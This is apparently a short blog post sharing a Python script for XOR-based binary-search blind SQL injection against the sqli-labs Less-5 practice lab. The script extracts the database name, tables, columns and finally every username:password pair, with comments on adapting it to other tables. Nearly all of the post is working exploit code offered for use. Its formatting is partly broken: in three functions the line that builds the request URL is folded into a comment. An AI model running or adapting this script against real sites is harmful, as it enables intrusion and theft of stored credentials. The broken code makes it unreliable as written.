异或二分法盲注脚本分享

异或二分法盲注脚本

# -*-coding:utf-8-*-  
  
import requests  
import time  
  
# 目标url  
host = "http://localhost/sqli-labs-master/Less-5/?id="  
  
  
# 获取数据库名  
def get_database():  
    global host  
    ans = ''  
   
    for i in range(1, 1000):  
        low = 32  
        high = 127  
        mid = (low+high)//2  
        while low < high:  
            payload = "1'^(ascii(substr((select(database())),%d,1))<%d)^1--+" % (i, mid)  
            url = host + payload  
            # print(url)  
            # param = {"username": payload, "password": "admin"}            
            # res = requests.post(host, data=param)  
            res = requests.get(url)  
            if "You are in" in res.text:  
                high = mid  
            else:  
                low = mid+1  
            mid = (low+high)//2  
        if mid <= 32 or mid >= 127:  
            break  
        ans += chr(mid-1)  
        print("database is -> "+ans)  
  
  
# 获取表名  
def get_table():  
    global host  
    ans = ''  
    for i in range(1, 1000):  
        low = 32  
        high = 127  
        mid = (low+high)//2  
        while low < high:  
            payload = "1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1--+" % (i, mid)  
            # param = {"username": payload, "password": "admin"}  
            # res = requests.post(host, data=param)            url = host + payload  
            res = requests.get(url)  
            if "You are in" in res.text:  
                high = mid  
            else:  
                low = mid+1  
            mid = (low+high)//2  
        if mid <= 32 or mid >= 127:  
            break  
        ans += chr(mid-1)  
        print("table is -> "+ans)  
  
  
# 获取列名  
def get_column():  
    global host  
    ans = ''  
    for i in range(1, 1000):  
        low = 32  
        high = 127  
        mid = (low+high)//2  
        while low < high:  
  
            # 表名要自己修改  
            payload = "1'^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),%d,1))<%d)^1--+" % (i, mid)  
            # param = {"username": payload, "password": "admin"}  
            # res = requests.post(host, data=param)            url = host + payload  
            res = requests.get(url)  
            if "You are in" in res.text:  
                high = mid  
            else:  
                low = mid+1  
            mid = (low+high)//2  
        if mid <= 32 or mid >= 127:  
            break  
        ans += chr(mid-1)  
        print("column is -> "+ans)  
  
  
# 脱裤  
def get_data():  
    global host  
    ans = ''  
    for i in range(1, 100000):  
        low = 32  
        high = 127  
        mid = (low+high)//2  
        while low < high:  
            # 修改表名和字段  
            payload = "1'^(ascii(substr((select(group_concat(username,0x3a,password))from(users)),%d,1))<%d)^1--+" % (i, mid)  
            # param = {"username": payload, "password": "admin"}  
            # res = requests.post(host, data=param)            url = host + payload  
            res = requests.get(url)  
            if "You are in" in res.text:  
                high = mid  
            else:  
                low = mid+1  
            mid = (low+high)//2  
        if mid <= 32 or mid >= 127:  
            break  
        ans += chr(mid-1)  
        print("dumpTable is -> "+ans)  

get_data()
posted @ 2024-07-12 14:28  Actwise  阅读(36)  评论(0)    收藏  举报